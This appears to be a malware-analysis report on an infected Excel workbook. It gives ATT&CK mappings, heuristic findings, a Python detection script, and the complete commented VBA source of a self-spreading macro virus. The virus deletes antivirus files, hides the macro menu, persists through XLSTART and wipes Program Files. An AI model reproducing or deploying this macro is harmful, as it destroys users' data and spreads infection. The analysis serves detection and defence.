Verdict: MALICIOUS (Risk Score 280)
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1137.006 Office Application Startup: Add-ins (persistence is a copy of the workbook saved as EXCEL.XLA in Application.StartupPath, not a Registry Run key or Startup folder)
T1562.001 Impair Defenses: Disable or Modify Tools (Kill on antivirus install directories, removal of the Tools > Macro menu item)
T1485 Data Destruction (date-triggered Deltree /y C:\Progra~1)
The Auto_Open VBA macro runs as soon as the workbook is opened. With error handling suppressed (On Error Resume Next), it uses Kill to delete the files of several antivirus products (AntiViral Toolkit Pro, FindVirus, F-PROT95, McAfee VirusScan, Norton AntiVirus) and removes the Tools > Macro item from every Excel menu bar so the user cannot inspect or disable macros. It then calls Enigma, a date-triggered payload: when the current day of the month equals a pseudo-random value in 1..31, it runs Shell("Deltree /y C:\Progra~1") to wipe Program Files and then loops a "Your computer is infected XM.Enigma virus by ULTRAS" message box forever. CHG checks whether an add-in named EXCEL.XLA containing a Sheet3 module is already loaded; if not, ING saves a copy of the workbook as EXCEL.XLA in Application.StartupPath (the XLSTART folder), opens it as a hidden window and saves it, so it loads with every future Excel session. Finally Auto_Open sets Application.OnSheetActivate to EXCEL.XLA!DIB, and DIB copies the infected Sheet3 (as a hidden sheet) into any workbook the user activates that does not already carry it. The procedure names are short but the source is not otherwise obfuscated; the destructive and persistence logic is visible in the decoded VBA below.
Heuristics (5)
- ClamAV: Xls.Trojan.Trasher-4 [critical, CLAMAV_DETECTION]: ClamAV detected this file as malware: Xls.Trojan.Trasher-4
- VBA macros detected [medium, OLE_VBA_MACROS, 3 related findings]: Document contains VBA macro code
- Shell() call in VBA [critical, OLE_VBA_SHELL]: Shell() call in VBA
- Auto_Open macro [high, OLE_VBA_AUTO]: Auto_Open macro
- VBA p-code auto-exec with execution tokens [high, OLE_VBA_PCODE_AUTOEXEC_EXEC]: Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable, because it reads the compiled stream rather than the decoded source shown below.
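The source-based heuristics above (auto-exec entry point, Shell() call, and the combination of the two) can be reproduced with a small static triage pass over the decoded VBA that olevba extracts. The following is an added example, not the analyzer's or oletools' own code; the rule identifiers OLE_VBA_KILL, OLE_VBA_STARTUP_PERSIST, OLE_VBA_MACRO_MENU_TAMPER, OLE_VBA_EVENT_HOOK and OLE_VBA_AUTOEXEC_EXEC, the severity weights, and the shortened VBA excerpt are all assumptions constructed for illustration from the macro shown on this page. It goes slightly beyond the report by also flagging Kill, SaveCopyAs into StartupPath, menu tampering and the OnSheetActivate hook, and it strips VBA comments first so that commented-out code does not fire a rule.

```python
"""Static triage of decoded VBA source for the behaviours this report flags.

Added example; not the analyzer's or oletools' code. Rule IDs other than
OLE_VBA_AUTO and OLE_VBA_SHELL, and the severity points, are assumptions.
"""
import re

# Constructed, shortened excerpt of the macro shown on this page.
SAMPLE_VBA = r'''
Sub Auto_Open()
On Error Resume Next
Kill "C:\Program Files\McAfee\VirusScan\*.*"
MenuBars(xlWorksheet).Menus("Tools").MenuItems("&Macro...").Delete
Call Enigma
Application.OnSheetActivate = "EXCEL.XLA!DIB"
End Sub
Function ING()
Workbooks(ab).SaveCopyAs Application.StartupPath + "\EXCEL.XLA"
End Function
Sub Enigma()
Shell ("Deltree /y C:\Progra~1")
End Sub
'''

SEVERITY_POINTS = {"critical": 100, "high": 50, "medium": 20}  # assumed weights

# Procedure names Office runs without user interaction.
AUTOEXEC_NAMES = ("Auto_Open", "Auto_Close", "AutoOpen", "AutoClose",
                  "Workbook_Open", "Document_Open")
AUTOEXEC_RE = re.compile(
    r'^\s*(?:Public\s+|Private\s+)?Sub\s+(' + "|".join(AUTOEXEC_NAMES) + r')\b',
    re.IGNORECASE)

# (rule id, severity, pattern) evaluated on every comment-stripped line.
RULES = [
    ("OLE_VBA_SHELL", "critical", re.compile(r'\bShell\s*\(', re.I)),
    ("OLE_VBA_KILL", "high", re.compile(r'\bKill\s+"', re.I)),
    ("OLE_VBA_STARTUP_PERSIST", "high",
     re.compile(r'\bSaveCopyAs\b.*\bStartupPath\b', re.I)),
    ("OLE_VBA_MACRO_MENU_TAMPER", "medium",
     re.compile(r'MenuItems\("&Macro\.\.\."\)\.Delete', re.I)),
    ("OLE_VBA_EVENT_HOOK", "medium", re.compile(r'\bOnSheetActivate\s*=', re.I)),
]


def strip_comment(line):
    """Drop a trailing VBA comment (apostrophe outside a string literal)."""
    out, in_str = [], False
    for ch in line:
        if ch == '"':
            in_str = not in_str
        elif ch == "'" and not in_str:
            break
        out.append(ch)
    return "".join(out)


def triage(vba_source):
    """Return a list of findings; each has id, severity, line and evidence."""
    findings = []
    for lineno, raw in enumerate(vba_source.splitlines(), start=1):
        line = strip_comment(raw)
        m = AUTOEXEC_RE.match(line)
        if m:
            findings.append({"id": "OLE_VBA_AUTO", "severity": "high",
                             "line": lineno, "evidence": m.group(1)})
        for rule_id, severity, rx in RULES:
            if rx.search(line):
                findings.append({"id": rule_id, "severity": severity,
                                 "line": lineno, "evidence": line.strip()})
    # Chained finding: an auto-exec entry point plus code execution or file
    # destruction is what the report's combined heuristic is looking for.
    ids = {f["id"] for f in findings}
    if "OLE_VBA_AUTO" in ids and ids & {"OLE_VBA_SHELL", "OLE_VBA_KILL"}:
        findings.append({"id": "OLE_VBA_AUTOEXEC_EXEC", "severity": "high",
                         "line": 0,
                         "evidence": "auto-exec entry point combined with Shell()/Kill"})
    return findings


def risk_score(findings):
    """Sum the assumed per-severity weights."""
    return sum(SEVERITY_POINTS[f["severity"]] for f in findings)


def verdict(findings):
    ids = {f["id"] for f in findings}
    if "OLE_VBA_AUTOEXEC_EXEC" in ids or "OLE_VBA_SHELL" in ids:
        return "MALICIOUS"
    if "OLE_VBA_AUTO" in ids:
        return "SUSPICIOUS"
    return "CLEAN"


if __name__ == "__main__":
    result = triage(SAMPLE_VBA)
    for f in result:
        print(f"{f['severity']:>8}  {f['id']:<28} line {f['line']}: {f['evidence']}")
    print("score:", risk_score(result), "verdict:", verdict(result))
```

Feed it the macros.bas that olevba writes out (`olevba --decode sample.xls`, or oletools' `VBA_Parser.extract_macros()` in Python) and it will flag the same entry point and Shell() call the report lists, plus the StartupPath persistence that the report describes in prose. Because this pass works on decoded source, it says nothing about a stomped or missing source stream; that case is what the p-code heuristic above exists for.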
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 | Detection | Obfuscation or payload |
|---|---|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 2682 bytes | 2e862e1cb278d2d561594800170ea4d9feca8f5446c31121b85d48b1d60a018b | ClamAV: Xls.Trojan.Trasher-4 | unlikely |
Preview script (first 1,000 lines of the extracted script)

```vba
Attribute VB_Name = "Sheet3"

' Entry point: Excel runs Auto_Open automatically when the workbook is opened.
Sub Auto_Open()
Attribute Auto_Open.VB_ProcData.VB_Invoke_Func = " \n14"
    On Error Resume Next            ' swallow every error (missing paths, locked files)
    Application.ScreenUpdating = False
    Application.DisplayAlerts = False
    ' Delete the install directories of common antivirus products, interleaved
    ' with removal of Tools > Macro from each Excel menu bar so macros cannot be inspected.
    Kill "C:\Program Files\AntiViral Toolkit Pro\*.*"
    MenuBars(xlWorksheet).Menus("Tools").MenuItems("&Macro...").Delete
    Kill "C:\Program Files\FindVirus\*.*"
    MenuBars(xlModule).Menus("Tools").MenuItems("&Macro...").Delete
    Kill "C:\f-macro\*.*"
    MenuBars(xlNoDocuments).Menus("Tools").MenuItems("&Macro...").Delete
    Kill "C:\Program Files\Command Software\F-PROT95\*.*"
    MenuBars(xlInfo).Menus("Tools").MenuItems("&Macro...").Delete
    Kill "C:\Program Files\McAfee\VirusScan\*.*"
    MenuBars(xlChart).Menus("Tools").MenuItems("&Macro...").Delete
    Kill "C:\Program Files\Norton AntiVirus\*.*"
    Call Enigma                     ' date-triggered destructive payload
    If CHG() Then
        GoTo EBU:                   ' add-in already installed, skip installation
    Else
        Call ING                    ' install EXCEL.XLA in the Excel startup path
    End If
EBU:
    ' Hook sheet activation so DIB infects every workbook the user switches to.
    Application.OnSheetActivate = "EXCEL.XLA!DIB"
End2:
End Sub

' Returns True when an open workbook named EXCEL.XLA already carries the Sheet3 module.
Function CHG() As Boolean
Attribute CHG.VB_ProcData.VB_Invoke_Func = " \n14"
    CHG = False
    For q = 1 To Application.Workbooks.Count
        If Application.Workbooks(q).Name = "EXCEL.XLA" Then
            For u = 1 To Application.Workbooks("EXCEL.XLA").Modules.Count
                If Application.Workbooks("EXCEL.XLA").Modules(u).Name = "Sheet3" Then
                    CHG = True
                End If
            Next u
        End If
    Next q
End Function

' Persistence: save a copy of the infected workbook as EXCEL.XLA in the Excel
' startup folder (XLSTART), open it as a hidden window and save it so it loads
' with every future Excel session.
Function ING()
Attribute ING.VB_ProcData.VB_Invoke_Func = " \n14"
    ab = ActiveWorkbook.Name
    Workbooks(ab).SaveCopyAs Application.StartupPath + "\EXCEL.XLA"
    Workbooks.Open (Application.StartupPath + "\EXCEL.XLA")
    Windows("EXCEL.XLA").Visible = False
    Application.Workbooks("EXCEL.XLA").Save
End Function

' Returns True when the active workbook already contains the Sheet3 module.
Function ADI() As Boolean
Attribute ADI.VB_ProcData.VB_Invoke_Func = " \n14"
    ac = ActiveWorkbook.Name
    ADI = False
    For y = 1 To Application.Workbooks(ac).Modules.Count
        If Application.Workbooks(ac).Modules(y).Name = "Sheet3" Then
            ADI = True
        End If
    Next y
End Function

' Infection routine, invoked through OnSheetActivate: copy the infected Sheet3
' from EXCEL.XLA into the active workbook as a hidden sheet.
Sub DIB()
Attribute DIB.VB_ProcData.VB_Invoke_Func = " \n14"
    ad = ActiveWorkbook.Name
    If ADI() Then
        GoTo KI                     ' already infected
    End If
    Application.ScreenUpdating = False
    Application.Windows("EXCEL.XLA").Visible = True
    Workbooks("EXCEL.XLA").Activate
    Sheets("Sheet3").Visible = True
    Workbooks("EXCEL.XLA").Sheets("Sheet3").Copy Before:=Workbooks(ad).Sheets(1)
    Workbooks(ad).Sheets("Sheet3").Visible = False
    Workbooks("EXCEL.XLA").Sheets("Sheet3").Visible = False
    Windows("EXCEL.XLA").Visible = False
KI:
    Close
End Sub

' Payload: when today's day of month equals a pseudo-random value in 1..31,
' wipe Program Files and loop a message box forever.
Sub Enigma()
Attribute Enigma.VB_ProcData.VB_Invoke_Func = " \n14"
    On Error Resume Next
    If Day(Now()) = Int((31 * Rnd) + 1) Then
        Shell ("Deltree /y C:\Progra~1")
        Do
            MsgBox "Your computer is infected XM.Enigma virus by ULTRAS", 16, "ULTRAS"
        Loop
    End If
End Sub
```